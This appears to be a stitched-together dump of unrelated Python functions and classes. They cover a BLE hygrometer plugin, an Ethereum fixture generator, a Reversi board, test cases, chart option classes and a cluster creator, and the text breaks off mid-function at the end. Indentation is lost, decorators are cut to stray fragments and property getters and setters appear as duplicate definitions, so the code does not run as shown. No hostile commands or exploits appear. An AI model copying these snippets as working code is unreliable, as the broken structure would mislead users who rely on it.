if (next_non_ws in (',', ';', '\n')):
pass
elif (next_non_ws in self.language.comment_chars):
pass
elif next_non_ws.isalnum():
self.add_comma = True
elif (next_non_ws in ("'", '"')):
self.add_comma = True
elif (next_non_ws in '([{'):
self.add_comma = True
elif (next_non_ws in '?'):
self.add_comma = True
elif (next_non_ws == '.'):
self.add_comma = True
elif (next_non_ws in '-+~'):
if (after_next_non_ws in ('+', '-', '(', '[', '.', '~')):
self.add_comma = True
elif after_next_non_ws.isalnum():
self.add_comma = True
if (self.in_lambda and (token.kind == 'KET')):
self.add_comma = False
self.in_lambda = False
return token
def token(self):
if self.delay_list:
tok = self.delay_list.pop(0)
return tok
tok = self.__token()
if (tok is None):
return None
if ((len(self.bracket_stack) > 1) or (tok.kind != 'M_BRA')):
return tok
open_bracket = tok
if (open_bracket.kind != 'M_BRA'):
raise ICE(('supposed open bracket is %s instead' % open_bracket.kind))
self.delay_list = [tok]
while self.bracket_stack:
tok = self.__token()
self.delay_list.append(tok)
if (tok is None):
break
close_bracket = self.delay_list[(- 1)]
if ((close_bracket is not None) and (close_bracket.kind != 'M_KET')):
raise ICE(('supposed close bracket is %s instead' % close_bracket.kind))
while close_bracket:
tok = self.__token()
self.delay_list.append(tok)
if (tok is None):
break
elif (tok.kind == 'CONTINUATION'):
continue
else:
break
tok = self.delay_list[(- 1)]
if (tok and (tok.kind == 'ASSIGNMENT')):
open_bracket.kind = 'A_BRA'
close_bracket.kind = 'A_KET'
tok = self.delay_list.pop(0)
return tok |
class Plugin(plugin.PluginProto):
PLUGIN_ID = 518
PLUGIN_NAME = 'Environment - BLE Xiaomi CGG1 Hygrometer (EXPERIMENTAL)'
PLUGIN_VALUENAME1 = 'Temperature'
PLUGIN_VALUENAME2 = 'Humidity'
PLUGIN_VALUENAME3 = 'Battery'
def __init__(self, taskindex):
plugin.PluginProto.__init__(self, taskindex)
self.dtype = rpieGlobals.DEVICE_TYPE_BLE
self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM
self.valuecount = 2
self.senddataoption = True
self.recdataoption = False
self.timeroption = True
self.timeroptional = True
self.connected = False
self.formulaoption = True
self.BLEPeripheral = False
self.cproc = False
self.waitnotifications = False
self.conninprogress = False
self.readinprogress = False
self.battery = 0
self.lastbatteryreq = 0
self.preread = 4000
self._lastdataservetime = 0
self._nextdataservetime = 0
self.TARR = []
self.HARR = []
self.failures = 0
self.lastrequest = 0
self.blestatus = None
def webform_load(self):
bledevs = BLEHelper.find_hci_devices()
options = []
optionvalues = []
if bledevs:
for bd in bledevs:
options.append(bd)
try:
optionvalues.append(int(bd[3:]))
except:
optionvalues.append(bd[3:])
webserver.addFormSelector('Local Device', 'plugin_518_dev', len(options), options, optionvalues, None, int(self.taskdevicepluginconfig[2]))
webserver.addFormTextBox('Device Address', 'plugin_518_addr', str(self.taskdevicepluginconfig[0]), 20)
webserver.addFormNote("Enable blueetooth then <a href='blescanner'>scan 'ClearGrass Temp & RH'</a> first.")
return True
def webform_save(self, params):
self.taskdevicepluginconfig[0] = str(webserver.arg('plugin_518_addr', params)).strip().lower()
try:
self.taskdevicepluginconfig[2] = int(webserver.arg('plugin_518_dev', params))
except:
self.taskdevicepluginconfig[2] = 0
self.plugin_init()
return True
def plugin_init(self, enableplugin=None):
plugin.PluginProto.plugin_init(self, enableplugin)
self.readinprogress = False
self.connected = False
self.conninprogress = False
self.waitnotifications = False
self.lastrequest = 0
self.TARR = []
self.HARR = []
try:
if self.preread:
pass
except:
self.preread = 4000
self.uservar[0] = 0
self.uservar[1] = 0
if self.enabled:
self.ports = str(self.taskdevicepluginconfig[0])
self.timer1s = True
self.battery = (- 1)
self._nextdataservetime = (rpieTime.millis() - self.preread)
self._lastdataservetime = 0
self.failures = 0
self._lastdataservetime = (rpieTime.millis() - ((self.interval - 2) * 1000))
if self.taskdevicepluginconfig[1]:
self.valuecount = 3
self.vtype = rpieGlobals.SENSOR_TYPE_TRIPLE
else:
self.valuecount = 2
self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM
try:
devnum = int(self.taskdevicepluginconfig[2])
self.blestatus = BLEHelper.BLEStatus[devnum]
except:
pass
else:
self.ports = ''
self.timer1s = False
def timer_once_per_second(self):
if self.enabled:
if ((self._nextdataservetime - rpieTime.millis()) <= self.preread):
if ((self.conninprogress == False) and (self.connected == False)):
self.waitnotifications = False
self.blestatus.unregisterdataprogress(self.taskindex)
if (len(self.taskdevicepluginconfig[0]) > 10):
self.cproc = threading.Thread(target=self.connectproc)
self.cproc.daemon = True
self.cproc.start()
return self.timer1s
def plugin_read(self):
result = False
if self.enabled:
if ((len(self.TARR) > 0) and (len(self.HARR) > 0)):
try:
self.set_value(1, self.TARR[(- 1)], False)
self.set_value(2, self.HARR[(- 1)], False)
self.plugin_senddata()
self._lastdataservetime = rpieTime.millis()
self._nextdataservetime = ((self._lastdataservetime + (self.interval * 1000)) - self.preread)
self.failures = 0
except:
pass
if (self.interval > 10):
self.disconnect()
self.TARR = []
self.HARR = []
elif (self._nextdataservetime < rpieTime.millis()):
self.isconnected()
def connectproc(self):
try:
if self.blestatus.isscaninprogress():
self.blestatus.requeststopscan(self.taskindex)
return False
except Exception as e:
return False
self.conninprogress = True
while ((self.blestatus.norequesters() == False) or (self.blestatus.nodataflows() == False)):
time.sleep(0.5)
misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE line not free for P518! ' + str(self.blestatus.dataflow)))
self.blestatus.registerdataprogress(self.taskindex)
prevstate = self.connected
try:
misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connection initiated to ' + str(self.taskdevicepluginconfig[0])))
time.sleep(uniform(0.4, 1.8))
self.BLEPeripheral = btle.Peripheral(str(self.taskdevicepluginconfig[0]), iface=self.taskdevicepluginconfig[2])
self.connected = True
self.failures = 0
self.BLEPeripheral.setDelegate(TempHumDelegateC1(self.callbackfunc))
except Exception as e:
self.connected = False
self.isconnected()
if (self.connected == False):
misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connection failed ' + str(self.taskdevicepluginconfig[0])))
self.blestatus.unregisterdataprogress(self.taskindex)
self.conninprogress = False
try:
self.disconnect()
except:
pass
time.sleep(uniform(1, 3))
self.failures = (self.failures + 1)
if (self.failures > 5):
if (self.interval < 120):
skiptime = (self.interval * 5000)
else:
skiptime = self.interval
self._nextdataservetime = (rpieTime.millis() + skiptime)
self._lastdataservetime = self._nextdataservetime
return False
else:
misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connected to ' + str(self.taskdevicepluginconfig[0])))
self.waitnotifications = True
time.sleep(0.1)
self.blestatus.unregisterdataprogress(self.taskindex)
self.conninprogress = False
def request_temp_hum_value(self, d=None):
res = False
if ((time.time() - self.lastrequest) > 2):
self.lastrequest = time.time()
try:
ch = self.BLEPeripheral.getCharacteristics(uuid=CGG_DATA)[0]
desc = ch.getDescriptors(forUUID=10498)[0]
desc.write(1 .to_bytes(2, byteorder='little'), withResponse=True)
res = True
except Exception as e:
self.blestatus.unregisterdataprogress(self.taskindex)
res = False
self.failures += 1
else:
res = True
return res
def isconnected(self, d=None):
if self.connected:
self.connected = self.request_temp_hum_value()
return self.connected
def get_battery_value(self):
return (- 1)
def callbackfunc(self, temp=None, hum=None):
self.connected = True
self.blestatus.unregisterdataprogress(self.taskindex)
if self.enabled:
self.TARR.append(temp)
self.HARR.append(hum)
if ((rpieTime.millis() - self._lastdataservetime) >= 2000):
self.plugin_read()
def disconnect(self):
self.connected = False
self.waitnotifications = False
if self.enabled:
try:
self.blestatus.unregisterdataprogress(self.taskindex)
if (self.BLEPeripheral is not None):
self.BLEPeripheral.disconnect()
self.cproc._stop()
except:
pass
def plugin_exit(self):
self.disconnect() |
def generate_go_ethereum_fixture(destination_dir):
with contextlib.ExitStack() as stack:
datadir = stack.enter_context(common.tempdir())
keystore_dir = os.path.join(datadir, 'keystore')
common.ensure_path_exists(keystore_dir)
keyfile_path = os.path.join(keystore_dir, common.KEYFILE_FILENAME)
with open(keyfile_path, 'w') as keyfile:
keyfile.write(common.KEYFILE_DATA)
genesis_file_path = os.path.join(datadir, 'genesis.json')
with open(genesis_file_path, 'w') as genesis_file:
genesis_file.write(json.dumps(common.GENESIS_DATA))
geth_ipc_path_dir = stack.enter_context(common.tempdir())
geth_ipc_path = os.path.join(geth_ipc_path_dir, 'geth.ipc')
geth_port = get_open_port()
geth_binary = common.get_geth_binary()
with get_geth_process(geth_binary=geth_binary, datadir=datadir, genesis_file_path=genesis_file_path, geth_ipc_path=geth_ipc_path, geth_port=geth_port):
common.wait_for_socket(geth_ipc_path)
w3 = Web3(Web3.IPCProvider(geth_ipc_path))
chain_data = setup_chain_state(w3)
verify_chain_state(w3, chain_data)
with get_geth_process(geth_binary=geth_binary, datadir=datadir, genesis_file_path=genesis_file_path, geth_ipc_path=geth_ipc_path, geth_port=geth_port):
common.wait_for_socket(geth_ipc_path)
w3 = Web3(Web3.IPCProvider(geth_ipc_path))
verify_chain_state(w3, chain_data)
static_data = {'raw_txn_account': common.RAW_TXN_ACCOUNT, 'keyfile_pw': common.KEYFILE_PW}
config = merge(chain_data, static_data)
pprint.pprint(config)
write_config_json(config, datadir)
shutil.make_archive(destination_dir, 'zip', datadir) |
def test_flexx_in_thread4():
res = []
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app.create_server()
def try_start():
try:
app.stop()
app.start()
except RuntimeError:
res.append('start-fail')
else:
res.append('start-ok')
def main():
app.create_server(loop=asyncio.new_event_loop())
try_start()
t = threading.Thread(target=try_start)
t.start()
t.join()
t = threading.Thread(target=main)
t.start()
t.join()
assert (res == ['start-fail', 'start-ok']) |
class Resources(_common.FlyteIdlEntity):
class ResourceName(object):
UNKNOWN = _core_task.Resources.UNKNOWN
CPU = _core_task.Resources.CPU
GPU = _core_task.Resources.GPU
MEMORY = _core_task.Resources.MEMORY
STORAGE = _core_task.Resources.STORAGE
EPHEMERAL_STORAGE = _core_task.Resources.EPHEMERAL_STORAGE
class ResourceEntry(_common.FlyteIdlEntity):
def __init__(self, name, value):
self._name = name
self._value = value
def name(self):
return self._name
def value(self):
return self._value
def to_flyte_idl(self):
return _core_task.Resources.ResourceEntry(name=self.name, value=self.value)
def from_flyte_idl(cls, pb2_object):
return cls(name=pb2_object.name, value=pb2_object.value)
def __init__(self, requests, limits):
self._requests = requests
self._limits = limits
def requests(self):
return self._requests
def limits(self):
return self._limits
def to_flyte_idl(self):
return _core_task.Resources(requests=[r.to_flyte_idl() for r in self.requests], limits=[r.to_flyte_idl() for r in self.limits])
def from_flyte_idl(cls, pb2_object):
return cls(requests=[Resources.ResourceEntry.from_flyte_idl(r) for r in pb2_object.requests], limits=[Resources.ResourceEntry.from_flyte_idl(l) for l in pb2_object.limits]) |
def test_redis_handler_backend_register_next_step_handler(telegram_bot, private_chat, update_type):
if (not REDIS_TESTS):
pytest.skip('please install redis and configure redis server, then enable REDIS_TESTS')
telegram_bot.next_step_backend = RedisHandlerBackend(prefix='pyTelegramBotApi:step_backend1')
_bot.message_handler(commands=['start'])
def start(message):
message.text = 'entered start'
telegram_bot.register_next_step_handler_by_chat_id(message.chat.id, next_handler)
telegram_bot.process_new_updates([update_type])
assert (update_type.message.text == 'entered start')
telegram_bot.process_new_updates([update_type])
assert (update_type.message.text == 'entered next_handler') |
def create_router_factory(fides_model: FidesModelType, model_type: str) -> APIRouter:
router = APIRouter(prefix=f'{API_PREFIX}/{model_type}', tags=[fides_model.__name__])
(name='Create', path='/', response_model=fides_model, status_code=status.HTTP_201_CREATED, dependencies=[Security(verify_oauth_client_prod, scopes=[f'{CLI_SCOPE_PREFIX_MAPPING[model_type]}:{CREATE}'])], responses={status.HTTP_403_FORBIDDEN: {'content': {'application/json': {'example': {'detail': {'error': 'user does not have permission to modify this resource', 'resource_type': model_type, 'fides_key': 'example.key'}}}}}})
async def create(resource: fides_model, db: AsyncSession=Depends(get_async_db)) -> Dict:
sql_model = sql_model_map[model_type]
if isinstance(resource, Dataset):
(await validate_data_categories(resource, db))
if (isinstance(sql_model, ModelWithDefaultField) and resource.is_default):
raise errors.ForbiddenError(model_type, resource.fides_key)
return (await create_resource(sql_model, resource.dict(), db))
return router |
class MergeGraph(BaseGraph):
def __init__(self, *args: Dict, input_classes: List):
self._args = args
self._input_classes = input_classes
merged_dag = self._build()
super().__init__(merged_dag, whoami='Merged Graph')
def _merge_inputs(*args: Dict):
key_set = {k for arg in args for k in arg.keys()}
super_dict = {k: set() for k in key_set}
for arg in args:
for (k, v) in arg.items():
super_dict[k].update(v)
return super_dict
def nodes(self):
return self._input_classes
def _build(self) -> Dict:
return self._merge_inputs(*self._args) |
def filter_log_fortianalyzer_setting_data(json):
option_list = ['__change_ip', 'access_config', 'alt_server', 'certificate', 'certificate_verification', 'conn_timeout', 'enc_algorithm', 'fallback_to_primary', 'faz_type', 'hmac_algorithm', 'interface', 'interface_select_method', 'ips_archive', 'max_log_rate', 'mgmt_name', 'monitor_failure_retry_period', 'monitor_keepalive_period', 'preshared_key', 'priority', 'reliable', 'serial', 'server', 'source_ip', 'ssl_min_proto_version', 'status', 'upload_day', 'upload_interval', 'upload_option', 'upload_time']
json = remove_invalid_fields(json)
dictionary = {}
for attribute in option_list:
if ((attribute in json) and (json[attribute] is not None)):
dictionary[attribute] = json[attribute]
return dictionary |
class Board():
def _reset(self):
self._board = []
self._lock = None
for _ in range(8):
self._board.append(([EMPTY] * 8))
self._board[3][3] = self._board[4][4] = BLACK
self._board[4][3] = self._board[3][4] = WHITE
def __init__(self, p=None):
self._reset()
self._lock = threading.Lock()
if isinstance(p, Board):
with p._lock:
self._board = copy.deepcopy(p._board)
elif (p != None):
raise ValueError('invaid parameter')
def count(self, bwe):
assert (bwe in (BLACK, WHITE, EMPTY))
n = 0
with self._lock:
for i in range(8):
for j in range(8):
if (self._board[i][j] == bwe):
n += 1
return n
def _has_my_piece(self, bw, x, y, delta_x, delta_y):
assert (bw in (BLACK, WHITE))
assert (delta_x in ((- 1), 0, 1))
assert (delta_y in ((- 1), 0, 1))
x += delta_x
y += delta_y
if ((x < 0) or (x > 7) or (y < 0) or (y > 7) or (self._board[x][y] == EMPTY)):
return False
if (self._board[x][y] == bw):
return True
return self._has_my_piece(bw, x, y, delta_x, delta_y)
def reversible_directions(self, bw, x, y):
assert (bw in (BLACK, WHITE))
with self._lock:
directions = []
if (self._board[x][y] != EMPTY):
return directions
for d in itertools.product([(- 1), 1, 0], [(- 1), 1, 0]):
if (d == (0, 0)):
continue
nx = (x + d[0])
ny = (y + d[1])
if ((nx < 0) or (nx > 7) or (ny < 0) or (ny > 7) or (self._board[nx][ny] != (bw * (- 1)))):
continue
if self._has_my_piece(bw, nx, ny, d[0], d[1]):
directions.append(d)
return directions
def _reverse_piece(self, bw, x, y, delta_x, delta_y):
assert (bw in (BLACK, WHITE))
x += delta_x
y += delta_y
assert (self._board[x][y] in (BLACK, WHITE))
if (self._board[x][y] == bw):
return
self._board[x][y] = bw
return self._reverse_piece(bw, x, y, delta_x, delta_y)
def put(self, x, y, bw):
assert (bw in (BLACK, WHITE))
directions = self.reversible_directions(bw, x, y)
if (len(directions) == 0):
return False
self._board[x][y] = bw
with self._lock:
for delta in directions:
self._reverse_piece(bw, x, y, delta[0], delta[1])
return True
def isAllowed(self, x, y, bw):
return (len(self.reversible_directions(bw, x, y)) != 0)
def _calc_score(self, bw, level):
assert (level in [1, 2]), (bw in (BLACK, WHITE))
my_score = 0
against_score = 0
for i in range(8):
for j in range(8):
if (self._board[i][j] == bw):
my_score += _WEIGHT_MATRICES[level][i][j]
elif (self._board[i][j] == (bw * (- 1))):
against_score += _WEIGHT_MATRICES[level][i][j]
return (my_score - against_score)
def find_best_position(self, bw, level):
assert (bw in (BLACK, WHITE))
board_copy = Board(self)
next_positions = {}
for i in range(8):
for j in range(8):
board = Board(board_copy)
if board.put(i, j, bw):
next_positions.setdefault(board._calc_score(bw, level), []).append((i, j))
return (random.choice(next_positions[max(next_positions)]) if next_positions else None)
def array(self):
return Board(self)._board |
def _load_unittest_test_cases(import_module_names: List[str]) -> None:
global _unittest_testcase_loaded
if _unittest_testcase_loaded:
return
_unittest_testcase_loaded = True
for test_case in _get_all_test_cases(import_module_names):
test_method_names = [test_method_name for test_method_name in dir(test_case) if (test_method_name.startswith('test') or test_method_name.startswith('ftest') or test_method_name.startswith('xtest')) if callable(getattr(test_case, test_method_name))]
if (not test_method_names):
continue
def get_context_code(test_case: unittest.TestCase) -> Callable[([testslide.dsl._DSLContext], None)]:
def context_code(context: testslide.dsl._DSLContext) -> None:
for test_method_name in test_method_names:
def test_result() -> Iterator[_TestSlideTestResult]:
result = _TestSlideTestResult()
(yield result)
result.aggregated_exceptions.raise_correct_exception()
def setup_and_teardown() -> Iterator[None]:
test_case.setUpClass()
(yield)
test_case.tearDownClass()
def gen_example_code(test_method_name: str) -> Callable:
def example_code(self: Any) -> None:
with test_result() as result:
with setup_and_teardown():
test_case(methodName=test_method_name)(result=result)
return example_code
if test_method_name.startswith('test'):
context.example(test_method_name)(gen_example_code(test_method_name))
if test_method_name.startswith('ftest'):
context.fexample(test_method_name)(gen_example_code(test_method_name))
if test_method_name.startswith('xtest'):
context.xexample(test_method_name)(gen_example_code(test_method_name))
return context_code
testslide.dsl.context('{}.{}'.format(test_case.__module__, test_case.__name__))(get_context_code(test_case)) |
class ConflictPredictionMetric(Metric[ConflictPredictionMetricResults]):
def calculate(self, data: InputData) -> ConflictPredictionMetricResults:
dataset_columns = process_columns(data.current_data, data.column_mapping)
prediction_name = dataset_columns.utility_columns.prediction
if (prediction_name is None):
raise ValueError('The prediction column should be presented')
columns = dataset_columns.get_all_features_list()
if (len(columns) == 0):
raise ValueError('Prediction conflict is not defined. No features provided')
if isinstance(prediction_name, str):
prediction_columns = [prediction_name]
elif isinstance(prediction_name, list):
prediction_columns = prediction_name
duplicates = data.current_data[data.current_data.duplicated(subset=columns, keep=False)]
number_not_stable_prediction = duplicates.drop(data.current_data[data.current_data.duplicated(subset=(columns + prediction_columns), keep=False)].index).shape[0]
share_not_stable_prediction = round((number_not_stable_prediction / data.current_data.shape[0]), 3)
reference = None
if (data.reference_data is not None):
duplicates_ref = data.reference_data[data.reference_data.duplicated(subset=columns, keep=False)]
number_not_stable_prediction_ref = duplicates_ref.drop(data.reference_data[data.reference_data.duplicated(subset=(columns + prediction_columns), keep=False)].index).shape[0]
share_not_stable_prediction_ref = round((number_not_stable_prediction_ref / data.reference_data.shape[0]), 3)
reference = ConflictPredictionData(number_not_stable_prediction=number_not_stable_prediction_ref, share_not_stable_prediction=share_not_stable_prediction_ref)
return ConflictPredictionMetricResults(current=ConflictPredictionData(number_not_stable_prediction=number_not_stable_prediction, share_not_stable_prediction=share_not_stable_prediction), reference=reference) |
class TestInlineHiliteGuessInline(util.MdCase):
extension = ['pymdownx.highlight', 'pymdownx.inlinehilite', 'pymdownx.superfences']
extension_configs = {'pymdownx.highlight': {'guess_lang': 'inline'}, 'pymdownx.inlinehilite': {'css_class': 'inlinehilite', 'style_plain_text': True}}
def test_guessing_inline(self):
self.check_markdown('`import module`.', '<p><code class="inlinehilite"><span class="kn">import</span> <span class="nn">module</span></code>.</p>')
def test_no_guessing_block(self):
self.check_markdown('\n ```\n <!DOCTYPE html>\n <html>\n <body>\n <h1>My great test</h1>\n <p>Thou shalt be re-educated through labour should this test ever fails.</p>\n </body>\n </html>\n ```\n ', '\n <div class="highlight"><pre><span></span><code><!DOCTYPE html>\n <html>\n <body>\n <h1>My great test</h1>\n <p>Thou shalt be re-educated through labour should this test ever fails.</p>\n </body>\n </html>\n </code></pre></div>\n ', True) |
class ExtendedLoopingCall(LoopingCall):
start_delay = None
callcount = 0
def start(self, interval, now=True, start_delay=None, count_start=0):
assert (not self.running), 'Tried to start an already running ExtendedLoopingCall.'
if (interval < 0):
raise ValueError('interval must be >= 0')
self.running = True
deferred = self._deferred = Deferred()
self.starttime = self.clock.seconds()
self.interval = interval
self._runAtStart = now
self.callcount = max(0, count_start)
self.start_delay = (start_delay if (start_delay is None) else max(0, start_delay))
if now:
self()
elif ((start_delay is not None) and (start_delay >= 0)):
(real_interval, self.interval) = (self.interval, start_delay)
self._scheduleFrom(self.starttime)
self.interval = real_interval
else:
self._scheduleFrom(self.starttime)
return deferred
def __call__(self):
self.callcount += 1
if self.start_delay:
self.start_delay = None
self.starttime = self.clock.seconds()
if self._deferred:
LoopingCall.__call__(self)
def force_repeat(self):
assert self.running, 'Tried to fire an ExtendedLoopingCall that was not running.'
self.call.cancel()
self.call = None
self.starttime = self.clock.seconds()
self()
def next_call_time(self):
if (self.running and (self.interval > 0)):
total_runtime = (self.clock.seconds() - self.starttime)
interval = (self.start_delay or self.interval)
return max(0, (interval - (total_runtime % self.interval))) |
_action_type(ofproto.OFPAT_METER, ofproto.OFP_ACTION_METER_SIZE)
class OFPActionMeter(OFPAction):
def __init__(self, meter_id, type_=None, len_=None):
super(OFPActionMeter, self).__init__()
self.meter_id = meter_id
def parser(cls, buf, offset):
(type_, len_, meter_id) = struct.unpack_from(ofproto.OFP_ACTION_METER_PACK_STR, buf, offset)
return cls(meter_id)
def serialize(self, buf, offset):
msg_pack_into(ofproto.OFP_ACTION_METER_PACK_STR, buf, offset, self.type, self.len, self.meter_id) |
def run_cmd(cmd, show_output=True, raise_errs=True, **kwargs):
internal_assert((cmd and isinstance(cmd, list)), 'console commands must be passed as non-empty lists')
if hasattr(shutil, 'which'):
cmd[0] = (shutil.which(cmd[0]) or cmd[0])
logger.log_cmd(cmd)
try:
if (show_output and raise_errs):
return subprocess.check_call(cmd, **kwargs)
elif show_output:
return subprocess.call(cmd, **kwargs)
else:
(stdout, stderr, retcode) = call_output(cmd, **kwargs)
output = (stdout + stderr)
if (retcode and raise_errs):
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
except OSError:
logger.log_exc()
if raise_errs:
raise subprocess.CalledProcessError(oserror_retcode, cmd)
elif show_output:
return oserror_retcode
else:
return '' |
class MonitorManager():
def __init__(self, requested_monitors):
self.initiate_monitors(requested_monitors)
def initiate_monitors(self, additional_monitors):
logging.info('initiating monitors: [%s]', ','.join(additional_monitors))
self.memorymap_monitor = MemorymapMonitor()
self.modules_monitor = ModulesMonitor()
self.monitors = [self.memorymap_monitor, self.modules_monitor]
for switch in additional_monitors:
if (switch == 'dummy'):
self.monitors.append(None)
def track_changes(self, interval):
for monitor in self.monitors:
monitor.track_changes(interval)
def get_memory_map_changes(self):
return self.memorymap_monitor.get_memory_map_changes()
def get_modules(self):
return self.modules_monitor.get_modules()
def collect_observations(self):
observations = {'first_snapshot': [], 'latest_snapshot': [], 'latest_changes': []}
for monitor in self.monitors:
observations['first_snapshot'].append(monitor.get_first_snapshot())
observations['latest_snapshot'].append(monitor.get_latest_snapshot())
observations['latest_changes'].append(monitor.get_latest_changes())
return observations
def collect_stats(self):
stats = {'changes': []}
for monitor in self.monitors:
stats['changes'].append(monitor.get_change_summary())
return stats |
def extractGstranslationWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_sine_wave(wave: WaveformGenerator, scope: Oscilloscope):
frequency = 500
wave.load_function('SI1', 'sine')
wave.generate('SI1', frequency)
time.sleep(0.1)
(x, y) = scope.capture(1, 10000, 1, trigger=0)
def expected_f(x, amplitude, frequency, phase):
return (amplitude * np.sin(((((2 * np.pi) * frequency) * x) + phase)))
amplitude = 3.3
guess = [amplitude, frequency, 0]
([amplitude_est, frequency_est, phase_est], _) = curve_fit(expected_f, (x * MICROSECONDS), y, guess)
assert (amplitude_est == pytest.approx(amplitude, rel=RELTOL))
assert (frequency_est == pytest.approx(frequency, rel=RELTOL))
coeff_of_det = r_squared(y, expected_f((x * MICROSECONDS), amplitude_est, frequency_est, phase_est))
assert (coeff_of_det >= GOOD_FIT) |
((sys.platform == 'win32'), reason='does not run on windows')
('shell,script,comp_func', [('bash', 'tests/scripts/test_bash_install_uninstall.sh', 'hydra_bash_completion'), ('fish', 'tests/scripts/test_fish_install_uninstall.fish', 'hydra_fish_completion')])
def test_install_uninstall(shell: str, script: str, comp_func: str) -> None:
if ((shell == 'fish') and (not is_fish_supported())):
skip('fish is not installed or the version is too old')
cmd = [shell, script, 'python hydra/test_utils/completion.py', comp_func]
subprocess.check_call(cmd, env={'PATH': os.environ['PATH']}) |
class OptionPlotoptionsFunnel3dTooltip(Options):
def clusterFormat(self):
return self._config_get('Clustered points: {point.clusterPointsAmount}')
def clusterFormat(self, text: str):
self._config(text, js_type=False)
def dateTimeLabelFormats(self) -> 'OptionPlotoptionsFunnel3dTooltipDatetimelabelformats':
return self._config_sub_data('dateTimeLabelFormats', OptionPlotoptionsFunnel3dTooltipDatetimelabelformats)
def distance(self):
return self._config_get(6)
def distance(self, num: float):
self._config(num, js_type=False)
def followPointer(self):
return self._config_get(False)
def followPointer(self, flag: bool):
self._config(flag, js_type=False)
def followTouchMove(self):
return self._config_get(True)
def followTouchMove(self, flag: bool):
self._config(flag, js_type=False)
def footerFormat(self):
return self._config_get('')
def footerFormat(self, text: str):
self._config(text, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def headerFormat(self):
return self._config_get(None)
def headerFormat(self, text: str):
self._config(text, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, text: str):
self._config(text, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def pointFormat(self):
return self._config_get(None)
def pointFormat(self, text: str):
self._config(text, js_type=False)
def pointFormatter(self):
return self._config_get(None)
def pointFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False)
def xDateFormat(self):
return self._config_get(None)
def xDateFormat(self, text: str):
self._config(text, js_type=False) |
class TestPutSettings():
('elasticsearch.Elasticsearch')
.asyncio
async def test_put_settings(self, es):
es.cluster.put_settings = mock.AsyncMock()
params = {'body': {'transient': {'indices.recovery.max_bytes_per_sec': '20mb'}}}
r = runner.PutSettings()
(await r(es, params))
es.cluster.put_settings.assert_awaited_once_with(body={'transient': {'indices.recovery.max_bytes_per_sec': '20mb'}}) |
class Creator(object):
DEFAULT_STORAGE_PATH = os.path.expanduser('~/.elasticluster/storage')
DEFAULT_STORAGE_TYPE = 'yaml'
def __init__(self, conf, storage_path=None, storage_type=None):
self.cluster_conf = conf['cluster']
self.storage_path = (os.path.expandvars(os.path.expanduser(storage_path)) if storage_path else self.DEFAULT_STORAGE_PATH)
self.storage_type = (storage_type or self.DEFAULT_STORAGE_TYPE)
def load_cluster(self, cluster_name):
repository = self.create_repository()
cluster = repository.get(cluster_name)
cluster._setup_provider = self.create_setup_provider(cluster.template)
cluster.cloud_provider = self.create_cloud_provider(cluster.template)
cluster.update_config(self.cluster_conf[cluster.template])
return cluster
def create_cloud_provider(self, cluster_template):
try:
conf_template = self.cluster_conf[cluster_template]
except KeyError:
raise ConfigurationError('No cluster template `{0}` found in configuration file'.format(cluster_template))
try:
cloud_conf = conf_template['cloud']
except KeyError:
raise ConfigurationError('No cloud section for cluster template `{0}` found in configuration file'.format(cluster_template))
try:
provider = cloud_conf['provider']
except KeyError:
raise ConfigurationError('No `provider` configuration defined in cloud section `{0}` of cluster template `{1}`'.format(cloud_conf.get('name', '***'), cluster_template))
try:
ctor = _get_provider(provider, CLOUD_PROVIDERS)
except KeyError:
raise ConfigurationError('Unknown cloud provider `{0}` for cluster `{1}`'.format(provider, cluster_template))
except (ImportError, AttributeError) as err:
raise RuntimeError('Unable to load cloud provider `{0}`: {1}: {2}'.format(provider, err.__class__.__name__, err))
provider_conf = cloud_conf.copy()
provider_conf.pop('provider')
provider_conf['storage_path'] = self.storage_path
try:
return ctor(**provider_conf)
except TypeError:
import inspect
(args, varargs, keywords, defaults) = inspect.getargspec(ctor.__init__)
if (defaults is not None):
defaulted = dict(((argname, value) for (argname, value) in zip(reversed(args), reversed(defaults))))
else:
defaulted = {}
for argname in args[1:]:
if ((argname not in provider_conf) and (argname not in defaulted)):
raise ConfigurationError('Missing required configuration parameter `{0}` in cloud section for cluster `{1}`'.format(argname, cluster_template))
def create_cluster(self, template, name=None, cloud=None, setup=None):
if (template not in self.cluster_conf):
raise ConfigurationError('No cluster template configuration by the name `{template}`'.format(template=template))
conf = self.cluster_conf[template]
extra = conf.copy()
extra.pop('cloud')
extra.pop('nodes')
extra.pop('setup')
extra['template'] = template
if (cloud is None):
cloud = self.create_cloud_provider(template)
if (name is None):
name = template
if (setup is None):
setup = self.create_setup_provider(template, name=name)
cluster = Cluster(name=(name or template), cloud_provider=cloud, setup_provider=setup, user_key_name=conf['login']['user_key_name'], user_key_public=conf['login']['user_key_public'], user_key_private=conf['login']['user_key_private'], repository=self.create_repository(), **extra)
nodes = conf['nodes']
for group_name in nodes:
group_conf = nodes[group_name]
for varname in ['image_user', 'image_userdata']:
group_conf.setdefault(varname, conf['login'][varname])
cluster.add_nodes(group_name, **group_conf)
return cluster
def create_setup_provider(self, cluster_template, name=None):
try:
conf_template = self.cluster_conf[cluster_template]
